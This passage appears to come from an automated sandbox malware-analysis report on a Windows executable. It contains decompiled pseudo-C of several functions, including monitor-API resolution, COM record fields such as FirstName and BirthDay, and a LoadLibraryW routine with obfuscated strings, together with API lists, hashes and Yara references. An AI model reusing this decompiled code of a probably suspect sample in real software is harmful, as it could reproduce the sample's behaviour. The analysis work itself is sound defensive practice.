				_Unknown_base(*)()* _t7;
				_Unknown_base(*)()* _t8;
				_Unknown_base(*)()* _t9;
				_Unknown_base(*)()* _t10;
				_Unknown_base(*)()* _t11;
				_Unknown_base(*)()* _t12;
				struct HINSTANCE__* _t18;

				if( *0x459e2c == 0) {
					 *0x459e30 = E00409088();
					_t18 = GetModuleHandleA("USER32");
					if(_t18 == 0) {
						L11:
						 *0x459e10 = 0;
						 *0x459e14 = 0;
						 *0x459e18 = 0;
						 *0x459e1c = 0;
						 *0x459e20 = 0;
						 *0x459e24 = 0;
						 *0x459e28 = 0;
						 *0x459e2c = 1;
						_t5 = 0;
					} else {
						_t6 = GetProcAddress(_t18, "GetSystemMetrics");
						 *0x459e10 = _t6;
						if(_t6 == 0) {
							goto L11;
						} else {
							_t7 = GetProcAddress(_t18, "MonitorFromWindow");
							 *0x459e14 = _t7;
							if(_t7 == 0) {
								goto L11;
							} else {
								_t8 = GetProcAddress(_t18, "MonitorFromRect");
								 *0x459e18 = _t8;
								if(_t8 == 0) {
									goto L11;
								} else {
									_t9 = GetProcAddress(_t18, "MonitorFromPoint");
									 *0x459e1c = _t9;
									if(_t9 == 0) {
										goto L11;
									} else {
										_t10 = GetProcAddress(_t18, "EnumDisplayMonitors");
										 *0x459e24 = _t10;
										if(_t10 == 0) {
											goto L11;
										} else {
											_t11 = GetProcAddress(_t18, "GetMonitorInfoA");
											 *0x459e20 = _t11;
											if(_t11 == 0) {
												goto L11;
											} else {
												_t12 = GetProcAddress(_t18, "EnumDisplayDevicesA");
												 *0x459e28 = _t12;
												if(_t12 == 0) {
													goto L11;
												} else {
													_t5 = 1;
													 *0x459e2c = 1;
												}
											}
										}
									}
								}
							}
						}
					}
					return _t5;
				} else {
					return 0 |  *0x459e20 != 0x00000000;
				}
			}












                                                                              0x004090de
                                                                              0x004090f9
                                                                              0x00409104
                                                                              0x00409108
                                                                              0x00409195
                                                                              0x00409195
                                                                              0x0040919b
                                                                              0x004091a1
                                                                              0x004091a7
                                                                              0x004091ad
                                                                              0x004091b3
                                                                              0x004091b9
                                                                              0x004091bf
                                                                              0x004091c9
                                                                              0x0040910e
                                                                              0x0040911a
                                                                              0x0040911e
                                                                              0x00409123
                                                                              0x00000000
                                                                              0x00409125
                                                                              0x0040912b
                                                                              0x0040912f
                                                                              0x00409134
                                                                              0x00000000
                                                                              0x00409136
                                                                              0x0040913c
                                                                              0x00409140
                                                                              0x00409145
                                                                              0x00000000
                                                                              0x00409147
                                                                              0x0040914d
                                                                              0x00409151
                                                                              0x00409156
                                                                              0x00000000
                                                                              0x00409158
                                                                              0x0040915e
                                                                              0x00409162
                                                                              0x00409167
                                                                              0x00000000
                                                                              0x00409169
                                                                              0x0040916f
                                                                              0x00409173
                                                                              0x00409178
                                                                              0x00000000
                                                                              0x0040917a
                                                                              0x00409180
                                                                              0x00409184
                                                                              0x00409189
                                                                              0x00000000
                                                                              0x0040918b
                                                                              0x0040918d
                                                                              0x0040918e
                                                                              0x0040918e
                                                                              0x00409189
                                                                              0x00409178
                                                                              0x00409167
                                                                              0x00409156
                                                                              0x00409145
                                                                              0x00409134
                                                                              0x00409123
                                                                              0x004091ce
                                                                              0x004090e0
                                                                              0x004090ec
                                                                              0x004090ec

                                                                              APIs
                                                                              • GetModuleHandleA.KERNEL32(USER32,?,?,?,00409226), ref: 004090FE
                                                                              • GetProcAddress.KERNEL32(00000000,GetSystemMetrics), ref: 0040911A
                                                                              • GetProcAddress.KERNEL32(00000000,MonitorFromWindow), ref: 0040912B
                                                                              • GetProcAddress.KERNEL32(00000000,MonitorFromRect), ref: 0040913C
                                                                              • GetProcAddress.KERNEL32(00000000,MonitorFromPoint), ref: 0040914D
                                                                              • GetProcAddress.KERNEL32(00000000,EnumDisplayMonitors), ref: 0040915E
                                                                              • GetProcAddress.KERNEL32(00000000,GetMonitorInfoA), ref: 0040916F
                                                                              • GetProcAddress.KERNEL32(00000000,EnumDisplayDevicesA), ref: 00409180
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.232065962.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000002.00000002.232033886.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232256010.0000000000432000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232336850.0000000000456000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232366609.000000000045A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232381898.000000000045C000.00000002.00020000.sdmp Download File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_400000_lK8vF3n2e7.jbxd
                                                                              Similarity
                                                                              • API ID: AddressProc$HandleModule
                                                                              • String ID: EnumDisplayDevicesA$EnumDisplayMonitors$GetMonitorInfoA$GetSystemMetrics$MonitorFromPoint$MonitorFromRect$MonitorFromWindow$USER32
                                                                              • API String ID: 667068680-68207542
                                                                              • Opcode ID: e4bd923a8c5b841524d939b8dde4bb30d36b876c01b00240882513378a86e5f0
                                                                              • Instruction ID: fd326d4a7ba620f1166f9423cf7bd1bb53e508db2de6eb18e1d5ac10db44dcd2
                                                                              • Opcode Fuzzy Hash: e4bd923a8c5b841524d939b8dde4bb30d36b876c01b00240882513378a86e5f0
                                                                              • Instruction Fuzzy Hash: 912110B1A40301DADB12EF25ACC652FBAE1B349742354043FE408F62D2D7B88C55EB5D
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 02228BAC, Relevance: 26.6, APIs: 1, Strings: 14, Instructions: 358libraryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • LoadLibraryW.KERNEL32(00000000), ref: 02229874
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.233128075.0000000002221000.00000020.00000001.sdmp, Offset: 02221000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_2221000_lK8vF3n2e7.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: LibraryLoad
                                                                              • String ID: ++2$#&v$:oz$<g$Cg+$H$QP3$]n#$h_6P$i;$ja$r"H$wbS|$x@ u
                                                                              • API String ID: 1029625771-1710544966
                                                                              • Opcode ID: 4a25c6bb4067349b5cdcedee25385dd7a3a7199b504ff3dd7c1ee5f71e2ad6fb
                                                                              • Instruction ID: daa4648bb4800a7e45352d207afca9afb7cabfb32074eaeb32a4b2e490743687
                                                                              • Opcode Fuzzy Hash: 4a25c6bb4067349b5cdcedee25385dd7a3a7199b504ff3dd7c1ee5f71e2ad6fb
                                                                              • Instruction Fuzzy Hash: CD52A5F48063698FDB619F429A897CDBB74BB01344F6096C8D25D3B214CB750B86CF8A
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 00407664, Relevance: 26.6, APIs: 11, Strings: 4, Instructions: 303COMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 73%
                                                                              			E00407664(void* __ebx, void* __ecx, void* __edi, void* __esi) {
				void* _t110;
				void* _t112;
				void* _t114;
				intOrPtr* _t118;
				intOrPtr* _t119;
				void* _t127;
				void* _t129;
				void* _t131;
				intOrPtr* _t135;
				intOrPtr* _t136;
				void* _t144;
				void* _t146;
				void* _t148;
				intOrPtr* _t152;
				intOrPtr* _t153;
				void* _t161;
				void* _t163;
				void* _t165;
				intOrPtr* _t169;
				intOrPtr* _t170;
				void* _t177;
				void* _t195;
				intOrPtr* _t260;
				void* _t262;

				E004128A0(E00430BAC, _t262);
				_t195 = __ecx;
				__imp__#8(_t262 - 0x24, __edi, __esi, __ebx);
				 *(_t262 - 4) =  *(_t262 - 4) & 0x00000000;
				 *((short*)(_t262 - 0x34)) = 8;
				 *((intOrPtr*)(_t262 - 0x2c)) = E0041FCB0(__ecx, "AdressID");
				 *(_t262 - 4) = 1;
				_t110 = E00406A15(E0040669E(0x458420), _t262 - 0x14);
				 *(_t262 - 4) = 2;
				_t112 = E004069CF(E0040669E(_t110), _t262 - 0x10, _t262 - 0x34);
				 *(_t262 - 4) = 3;
				_t114 = E0040626B(E0040669E(_t112), _t262 - 0x44);
				 *(_t262 - 4) = 4;
				E0040620C(_t114, _t262 - 0x24, _t114);
				_t260 = __imp__#9;
				_push(_t262 - 0x44);
				 *(_t262 - 4) = 3;
				if( *_t260() < 0) {
					E0041FC30(_t117);
				}
				_t118 =  *((intOrPtr*)(_t262 - 0x10));
				 *(_t262 - 4) = 2;
				if(_t118 != 0) {
					 *((intOrPtr*)( *_t118 + 8))(_t118);
				}
				_t119 =  *((intOrPtr*)(_t262 - 0x14));
				 *(_t262 - 4) = 1;
				if(_t119 != 0) {
					 *((intOrPtr*)( *_t119 + 8))(_t119);
				}
				_push(_t262 - 0x34);
				 *(_t262 - 4) = 0;
				if( *_t260() < 0) {
					E0041FC30(_t121);
				}
				E0040622A(_t262 - 0x24, 8, 0);
				E00409CC2(_t195 + 0x11c, _t262,  *((intOrPtr*)(_t262 - 0x1c)));
				 *((short*)(_t262 - 0x34)) = 8;
				 *((intOrPtr*)(_t262 - 0x2c)) = E0041FCB0(_t195 + 0x11c, "FirstName");
				 *(_t262 - 4) = 5;
				_t127 = E00406A15(E0040669E(0x458420), _t262 - 0x10);
				 *(_t262 - 4) = 6;
				_t129 = E004069CF(E0040669E(_t127), _t262 - 0x14, _t262 - 0x34);
				 *(_t262 - 4) = 7;
				_t131 = E0040626B(E0040669E(_t129), _t262 - 0x44);
				 *(_t262 - 4) = 8;
				E0040620C(_t131, _t262 - 0x24, _t131);
				_push(_t262 - 0x44);
				 *(_t262 - 4) = 7;
				if( *_t260() < 0) {
					E0041FC30(_t134);
				}
				_t135 =  *((intOrPtr*)(_t262 - 0x14));
				 *(_t262 - 4) = 6;
				if(_t135 != 0) {
					 *((intOrPtr*)( *_t135 + 8))(_t135);
				}
				_t136 =  *((intOrPtr*)(_t262 - 0x10));
				 *(_t262 - 4) = 5;
				if(_t136 != 0) {
					 *((intOrPtr*)( *_t136 + 8))(_t136);
				}
				_push(_t262 - 0x34);
				 *(_t262 - 4) = 0;
				if( *_t260() < 0) {
					E0041FC30(_t138);
				}
				E0040622A(_t262 - 0x24, 8, 0);
				E00409CC2(_t195 + 0x114, _t262,  *((intOrPtr*)(_t262 - 0x1c)));
				 *((short*)(_t262 - 0x34)) = 8;
				 *((intOrPtr*)(_t262 - 0x2c)) = E0041FCB0(_t195 + 0x114, "LastName");
				 *(_t262 - 4) = 9;
				_t144 = E00406A15(E0040669E(0x458420), _t262 - 0x10);
				 *(_t262 - 4) = 0xa;
				_t146 = E004069CF(E0040669E(_t144), _t262 - 0x14, _t262 - 0x34);
				 *(_t262 - 4) = 0xb;
				_t148 = E0040626B(E0040669E(_t146), _t262 - 0x44);
				 *(_t262 - 4) = 0xc;
				E0040620C(_t148, _t262 - 0x24, _t148);
				_push(_t262 - 0x44);
				 *(_t262 - 4) = 0xb;
				if( *_t260() < 0) {
					E0041FC30(_t151);
				}
				_t152 =  *((intOrPtr*)(_t262 - 0x14));
				 *(_t262 - 4) = 0xa;
				if(_t152 != 0) {
					 *((intOrPtr*)( *_t152 + 8))(_t152);
				}
				_t153 =  *((intOrPtr*)(_t262 - 0x10));
				 *(_t262 - 4) = 9;
				if(_t153 != 0) {
					 *((intOrPtr*)( *_t153 + 8))(_t153);
				}
				_push(_t262 - 0x34);
				 *(_t262 - 4) = 0;
				if( *_t260() < 0) {
					E0041FC30(_t155);
				}
				E0040622A(_t262 - 0x24, 8, 0);
				E00409CC2(_t195 + 0x118, _t262,  *((intOrPtr*)(_t262 - 0x1c)));
				 *((short*)(_t262 - 0x34)) = 8;
				 *((intOrPtr*)(_t262 - 0x2c)) = E0041FCB0(_t195 + 0x118, "BirthDay");
				 *(_t262 - 4) = 0xd;
				_t161 = E00406A15(E0040669E(0x458420), _t262 - 0x10);
				 *(_t262 - 4) = 0xe;
				_t163 = E004069CF(E0040669E(_t161), _t262 - 0x14, _t262 - 0x34);
				 *(_t262 - 4) = 0xf;
				_t165 = E0040626B(E0040669E(_t163), _t262 - 0x44);
				 *(_t262 - 4) = 0x10;
				E0040620C(_t165, _t262 - 0x24, _t165);
				_push(_t262 - 0x44);
				 *(_t262 - 4) = 0xf;
				if( *_t260() < 0) {
					E0041FC30(_t168);
				}
				_t169 =  *((intOrPtr*)(_t262 - 0x14));
				 *(_t262 - 4) = 0xe;
				if(_t169 != 0) {
					 *((intOrPtr*)( *_t169 + 8))(_t169);
				}
				_t170 =  *((intOrPtr*)(_t262 - 0x10));
				 *(_t262 - 4) = 0xd;
				if(_t170 != 0) {
					 *((intOrPtr*)( *_t170 + 8))(_t170);
				}
				_push(_t262 - 0x34);
				 *(_t262 - 4) = 0;
				if( *_t260() < 0) {
					E0041FC30(_t172);
				}
				E0040622A(_t262 - 0x24, 8, 0);
				E00409CC2(_t195 + 0x110, _t262,  *((intOrPtr*)(_t262 - 0x1c)));
				E00425C57(_t195);
				 *(_t262 - 4) =  *(_t262 - 4) | 0xffffffff;
				_t177 =  *_t260(_t262 - 0x24, 0);
				if(_t177 < 0) {
					_t177 = E0041FC30(_t177);
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t262 - 0xc));
				return _t177;
			}



























                                                                              0x00407669
                                                                              0x00407678
                                                                              0x0040767a
                                                                              0x00407680
                                                                              0x00407689
                                                                              0x00407694
                                                                              0x004076a2
                                                                              0x004076ad
                                                                              0x004076bc
                                                                              0x004076c7
                                                                              0x004076d2
                                                                              0x004076dd
                                                                              0x004076e6
                                                                              0x004076ea
                                                                              0x004076ef
                                                                              0x004076f8
                                                                              0x004076f9
                                                                              0x00407701
                                                                              0x00407704
                                                                              0x00407704
                                                                              0x00407709
                                                                              0x0040770e
                                                                              0x00407712
                                                                              0x00407717
                                                                              0x00407717
                                                                              0x0040771a
                                                                              0x0040771f
                                                                              0x00407723
                                                                              0x00407728
                                                                              0x00407728
                                                                              0x0040772e
                                                                              0x0040772f
                                                                              0x00407737
                                                                              0x0040773a
                                                                              0x0040773a
                                                                              0x00407746
                                                                              0x00407754
                                                                              0x0040775e
                                                                              0x00407769
                                                                              0x00407772
                                                                              0x0040777d
                                                                              0x0040778c
                                                                              0x00407797
                                                                              0x004077a2
                                                                              0x004077ad
                                                                              0x004077b6
                                                                              0x004077ba
                                                                              0x004077c2
                                                                              0x004077c3
                                                                              0x004077cb
                                                                              0x004077ce
                                                                              0x004077ce
                                                                              0x004077d3
                                                                              0x004077d8
                                                                              0x004077dc
                                                                              0x004077e1
                                                                              0x004077e1
                                                                              0x004077e4
                                                                              0x004077e9
                                                                              0x004077ed
                                                                              0x004077f2
                                                                              0x004077f2
                                                                              0x004077f8
                                                                              0x004077f9
                                                                              0x00407801
                                                                              0x00407804
                                                                              0x00407804
                                                                              0x00407810
                                                                              0x0040781e
                                                                              0x00407828
                                                                              0x00407833
                                                                              0x0040783c
                                                                              0x00407847
                                                                              0x00407856
                                                                              0x00407861
                                                                              0x0040786c
                                                                              0x00407877
                                                                              0x00407880
                                                                              0x00407884
                                                                              0x0040788c
                                                                              0x0040788d
                                                                              0x00407895
                                                                              0x00407898
                                                                              0x00407898
                                                                              0x0040789d
                                                                              0x004078a2
                                                                              0x004078a6
                                                                              0x004078ab
                                                                              0x004078ab
                                                                              0x004078ae
                                                                              0x004078b3
                                                                              0x004078b7
                                                                              0x004078bc
                                                                              0x004078bc
                                                                              0x004078c2
                                                                              0x004078c3
                                                                              0x004078cb
                                                                              0x004078ce
                                                                              0x004078ce
                                                                              0x004078da
                                                                              0x004078e8
                                                                              0x004078f2
                                                                              0x004078fd
                                                                              0x00407906
                                                                              0x00407911
                                                                              0x00407920
                                                                              0x0040792b
                                                                              0x00407936
                                                                              0x00407941
                                                                              0x0040794a
                                                                              0x0040794e
                                                                              0x00407956
                                                                              0x00407957
                                                                              0x0040795f
                                                                              0x00407962
                                                                              0x00407962
                                                                              0x00407967
                                                                              0x0040796c
                                                                              0x00407970
                                                                              0x00407975
                                                                              0x00407975
                                                                              0x00407978
                                                                              0x0040797d
                                                                              0x00407981
                                                                              0x00407986
                                                                              0x00407986
                                                                              0x0040798c
                                                                              0x0040798d
                                                                              0x00407995
                                                                              0x00407998
                                                                              0x00407998
                                                                              0x004079a4
                                                                              0x004079b2
                                                                              0x004079bb
                                                                              0x004079c0
                                                                              0x004079c8
                                                                              0x004079cf
                                                                              0x004079d2
                                                                              0x004079d2
                                                                              0x004079da
                                                                              0x004079e2

                                                                              APIs
                                                                              • __EH_prolog.LIBCMT ref: 00407669
                                                                              • VariantInit.OLEAUT32(?), ref: 0040767A
                                                                                • Part of subcall function 0041FCB0: lstrlenA.KERNEL32(?), ref: 0041FCE2
                                                                                • Part of subcall function 0041FCB0: MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,00000000,00000000), ref: 0041FCF8
                                                                                • Part of subcall function 0040626B: VariantInit.OLEAUT32(?), ref: 0040627C
                                                                                • Part of subcall function 0040620C: VariantCopy.OLEAUT32(?,?), ref: 00406214
                                                                              • VariantClear.OLEAUT32(?), ref: 004076FD
                                                                              • VariantClear.OLEAUT32(00000008), ref: 00407733
                                                                              • VariantClear.OLEAUT32(?), ref: 004077C7
                                                                              • VariantClear.OLEAUT32(00000008), ref: 004077FD
                                                                              • VariantClear.OLEAUT32(?), ref: 00407891
                                                                              • VariantClear.OLEAUT32(00000008), ref: 004078C7
                                                                              • VariantClear.OLEAUT32(?), ref: 0040795B
                                                                              • VariantClear.OLEAUT32(00000008), ref: 00407991
                                                                              • VariantClear.OLEAUT32(?), ref: 004079C8
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.232065962.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000002.00000002.232033886.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232256010.0000000000432000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232336850.0000000000456000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232366609.000000000045A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232381898.000000000045C000.00000002.00020000.sdmp Download File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_400000_lK8vF3n2e7.jbxd
                                                                              Similarity
                                                                              • API ID: Variant$Clear$Init$ByteCharCopyH_prologMultiWidelstrlen
                                                                              • String ID: AdressID$BirthDay$FirstName$LastName
                                                                              • API String ID: 68346186-934635829
                                                                              • Opcode ID: e2dac832ece1b170b46b9b78bcb140af996838cc1348b689110b941efa8c6c93
                                                                              • Instruction ID: 1c6b82c77e47a3c48bff7a789f4c0ac1bccabe7c15a28163262571bff6dcae12
                                                                              • Opcode Fuzzy Hash: e2dac832ece1b170b46b9b78bcb140af996838cc1348b689110b941efa8c6c93
                                                                              • Instruction Fuzzy Hash: EAB18271E05249AADF04E7F5C955BDEB7F86F14308F1044AEA406F72C2EA386E09C769
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 00417191, Relevance: 26.4, APIs: 11, Strings: 4, Instructions: 115fileCOMMONLIBRARYCODE
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 71%
                                                                              			E00417191() {
				intOrPtr _t20;
				int _t21;
				long _t24;
				void* _t31;
				void* _t51;
				long _t52;
				void* _t57;
				signed int _t67;
				void** _t69;
				void* _t70;
				void* _t72;
				void* _t73;

				_t70 = _t72 - 0x8c;
				_t73 = _t72 - 0x10c;
				_t20 =  *0x457184; // 0xc72e1596
				_t52 =  *(_t70 + 0x94);
				 *((intOrPtr*)(_t70 + 0x88)) = _t20;
				_t21 = 0;
				while(_t52 !=  *((intOrPtr*)(0x457720 + _t21 * 8))) {
					_t21 = _t21 + 1;
					if(_t21 < 0x13) {
						continue;
					}
					break;
				}
				_t67 = _t21 << 3;
				_t6 = _t67 + 0x457720; // 0x60000000
				if(_t52 ==  *_t6) {
					_t21 =  *0x45a3e8; // 0x0
					if(_t21 == 1 || _t21 == 0 &&  *0x457180 == 1) {
						_t17 = _t67 + 0x457724; // 0x44c360
						_t69 = _t17;
						_t24 = E00411A30( *_t69);
						_t21 = WriteFile(GetStdHandle(0xfffffff4),  *_t69, _t24, _t70 + 0x94, 0);
					} else {
						if(_t52 != 0xfc) {
							 *((char*)(_t70 + 0x84)) = 0;
							if(GetModuleFileNameA(0, _t70 - 0x80, 0x104) == 0) {
								E00419460(_t70 - 0x80, "<program name unknown>");
							}
							_t63 = _t70 - 0x80;
							if(E00411A30(_t70 - 0x80) + 1 > 0x3c) {
								E0041ADB0(E00411A30(_t63) + _t70 - 0x45, "...", 3);
								_t73 = _t73 + 0x10;
							}
							_t31 = E00411A30(_t63);
							_t12 = _t67 + 0x457724; // 0x44c360
							_t14 = E00411A30( *_t12) + 0x1c; // 0x1c
							_pop(_t57);
							E00412260(_t31 + _t14 + 0x00000003 & 0xfffffffc, _t57);
							_t51 = _t73;
							E00419460(_t51, "Runtime Error!\n\nProgram: ");
							E00419470(_t51, _t63);
							E00419470(_t51, "\n\n");
							_t15 = _t67 + 0x457724; // 0x44c360
							E00419470(_t51,  *_t15);
							_push(0x12010);
							_push("Microsoft Visual C++ Runtime Library");
							_push(_t51);
							_t21 = E0041C6F5();
						}
					}
				}
				return E00412FBB(_t21,  *((intOrPtr*)(_t70 + 0x88)));
			}















                                                                              0x00417192
                                                                              0x00417199
                                                                              0x0041719f
                                                                              0x004171a4
                                                                              0x004171ac
                                                                              0x004171b5
                                                                              0x004171b7
                                                                              0x004171c0
                                                                              0x004171c4
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x004171c4
                                                                              0x004171c8
                                                                              0x004171cb
                                                                              0x004171d1
                                                                              0x004171d7
                                                                              0x004171df
                                                                              0x004172cc
                                                                              0x004172cc
                                                                              0x004172d4
                                                                              0x004172e6
                                                                              0x004171f6
                                                                              0x004171fc
                                                                              0x0041720c
                                                                              0x0041721a
                                                                              0x00417225
                                                                              0x0041722b
                                                                              0x0041722c
                                                                              0x0041723c
                                                                              0x00417258
                                                                              0x0041725d
                                                                              0x0041725d
                                                                              0x00417261
                                                                              0x00417266
                                                                              0x00417273
                                                                              0x0041727b
                                                                              0x0041727f
                                                                              0x00417284
                                                                              0x0041728c
                                                                              0x00417293
                                                                              0x0041729e
                                                                              0x004172a3
                                                                              0x004172aa
                                                                              0x004172af
                                                                              0x004172b4
                                                                              0x004172b9
                                                                              0x004172ba
                                                                              0x004172bf
                                                                              0x004171fc
                                                                              0x004171df
                                                                              0x00417307

                                                                              APIs
                                                                              • GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000,00000000,00000000), ref: 00417212
                                                                              • _strcat.LIBCMT ref: 00417225
                                                                              • _strlen.LIBCMT ref: 00417232
                                                                              • _strlen.LIBCMT ref: 00417241
                                                                              • _strncpy.LIBCMT ref: 00417258
                                                                              • _strlen.LIBCMT ref: 00417261
                                                                              • _strlen.LIBCMT ref: 0041726E
                                                                              • _strcat.LIBCMT ref: 0041728C
                                                                              • _strlen.LIBCMT ref: 004172D4
                                                                              • GetStdHandle.KERNEL32(000000F4,0044C360,00000000,?,00000000,00000000,00000000,00000000), ref: 004172DF
                                                                              • WriteFile.KERNEL32(00000000), ref: 004172E6
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.232065962.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000002.00000002.232033886.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232256010.0000000000432000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232336850.0000000000456000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232366609.000000000045A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232381898.000000000045C000.00000002.00020000.sdmp Download File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_400000_lK8vF3n2e7.jbxd
                                                                              Similarity
                                                                              • API ID: _strlen$File_strcat$HandleModuleNameWrite_strncpy
                                                                              • String ID: ...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program:
                                                                              • API String ID: 3601721357-4022980321
                                                                              • Opcode ID: 64fa949466da343b4dac7115b10c594ed8a6de38688c214b274feb0bc3a67c8a
                                                                              • Instruction ID: a00c1cefda7e3fb725995756c529dfe4bdf406af58d6cee0adc4c839edc60a66
                                                                              • Opcode Fuzzy Hash: 64fa949466da343b4dac7115b10c594ed8a6de38688c214b274feb0bc3a67c8a
                                                                              • Instruction Fuzzy Hash: 06314A325042046BDB24AB75ED85FEF3778EB44348F14442BF912D3292DA7CA8C5872C
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 00406A4B, Relevance: 23.0, APIs: 9, Strings: 4, Instructions: 276COMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 74%
                                                                              			E00406A4B(void* __ecx) {
				void* _t102;
				void* _t105;
				void* _t107;
				intOrPtr* _t110;
				intOrPtr* _t111;
				void* _t120;
				void* _t122;
				intOrPtr* _t125;
				intOrPtr* _t126;
				void* _t135;
				void* _t137;
				intOrPtr* _t140;
				intOrPtr* _t141;
				void* _t147;
				void* _t150;
				void* _t152;
				intOrPtr* _t155;
				intOrPtr* _t156;
				void* _t163;
				intOrPtr* _t182;
				void* _t229;
				void* _t235;

				E004128A0(E00430A8E, _t235);
				_push(1);
				_t229 = __ecx;
				E00425C57(__ecx);
				E0040630F(E0040669E(0x458420), 0x458040, 0x458040);
				 *((short*)(_t235 - 0x30)) = 8;
				 *((intOrPtr*)(_t235 - 0x28)) = E0041FCB0(_t99, "AdressID");
				 *(_t235 - 4) =  *(_t235 - 4) & 0x00000000;
				_t102 = E004061D9(_t235 - 0x50,  *((intOrPtr*)(__ecx + 0x11c)));
				 *(_t235 - 4) = 1;
				_t105 = E00406A15(E0040669E(0x458420), _t235 - 0x14);
				 *(_t235 - 4) = 2;
				_t107 = E004069CF(E0040669E(_t105), _t235 - 0x10, _t235 - 0x30);
				 *(_t235 - 4) = 3;
				_t195 = E0040669E(_t107);
				E004062B5(_t108, _t102);
				_t110 =  *((intOrPtr*)(_t235 - 0x10));
				 *(_t235 - 4) = 2;
				if(_t110 != 0) {
					_t195 =  *_t110;
					 *((intOrPtr*)( *_t110 + 8))(_t110);
				}
				_t111 =  *((intOrPtr*)(_t235 - 0x14));
				 *(_t235 - 4) = 1;
				if(_t111 != 0) {
					_t195 =  *_t111;
					 *((intOrPtr*)( *_t111 + 8))(_t111);
				}
				_t182 = __imp__#9;
				_push(_t235 - 0x50);
				 *(_t235 - 4) = 0;
				if( *_t182() < 0) {
					E0041FC30(_t113);
				}
				 *(_t235 - 4) =  *(_t235 - 4) | 0xffffffff;
				_push(_t235 - 0x30);
				if( *_t182() < 0) {
					E0041FC30(_t115);
				}
				 *((short*)(_t235 - 0x30)) = 8;
				 *((intOrPtr*)(_t235 - 0x28)) = E0041FCB0(_t195, "FirstName");
				 *(_t235 - 4) = 4;
				 *((intOrPtr*)(_t235 - 0x14)) = E004061D9(_t235 - 0x50,  *((intOrPtr*)(_t229 + 0x114)));
				 *(_t235 - 4) = 5;
				_t120 = E00406A15(E0040669E(0x458420), _t235 - 0x18);
				 *(_t235 - 4) = 6;
				_t122 = E004069CF(E0040669E(_t120), _t235 - 0x10, _t235 - 0x30);
				 *(_t235 - 4) = 7;
				_t204 = E0040669E(_t122);
				E004062B5(_t123,  *((intOrPtr*)(_t235 - 0x14)));
				_t125 =  *((intOrPtr*)(_t235 - 0x10));
				 *(_t235 - 4) = 6;
				if(_t125 != 0) {
					_t204 =  *_t125;
					 *((intOrPtr*)( *_t125 + 8))(_t125);
				}
				_t126 =  *((intOrPtr*)(_t235 - 0x18));
				 *(_t235 - 4) = 5;
				if(_t126 != 0) {
					_t204 =  *_t126;
					 *((intOrPtr*)( *_t126 + 8))(_t126);
				}
				_push(_t235 - 0x50);
				 *(_t235 - 4) = 4;
				if( *_t182() < 0) {
					E0041FC30(_t128);
				}
				 *(_t235 - 4) =  *(_t235 - 4) | 0xffffffff;
				_push(_t235 - 0x30);
				if( *_t182() < 0) {
					E0041FC30(_t130);
				}
				 *((short*)(_t235 - 0x30)) = 8;
				 *((intOrPtr*)(_t235 - 0x28)) = E0041FCB0(_t204, "LastName");
				 *(_t235 - 4) = 8;
				 *((intOrPtr*)(_t235 - 0x18)) = E004061D9(_t235 - 0x50,  *((intOrPtr*)(_t229 + 0x118)));
				 *(_t235 - 4) = 9;
				_t135 = E00406A15(E0040669E(0x458420), _t235 - 0x10);
				 *(_t235 - 4) = 0xa;
				_t137 = E004069CF(E0040669E(_t135), _t235 - 0x14, _t235 - 0x30);
				 *(_t235 - 4) = 0xb;
				_t213 = E0040669E(_t137);
				E004062B5(_t138,  *((intOrPtr*)(_t235 - 0x18)));
				_t140 =  *((intOrPtr*)(_t235 - 0x14));
				 *(_t235 - 4) = 0xa;
				if(_t140 != 0) {
					_t213 =  *_t140;
					 *((intOrPtr*)( *_t140 + 8))(_t140);
				}
				_t141 =  *((intOrPtr*)(_t235 - 0x10));
				 *(_t235 - 4) = 9;
				if(_t141 != 0) {
					_t213 =  *_t141;
					 *((intOrPtr*)( *_t141 + 8))(_t141);
				}
				_push(_t235 - 0x50);
				 *(_t235 - 4) = 8;
				if( *_t182() < 0) {
					E0041FC30(_t143);
				}
				 *(_t235 - 4) =  *(_t235 - 4) | 0xffffffff;
				_push(_t235 - 0x30);
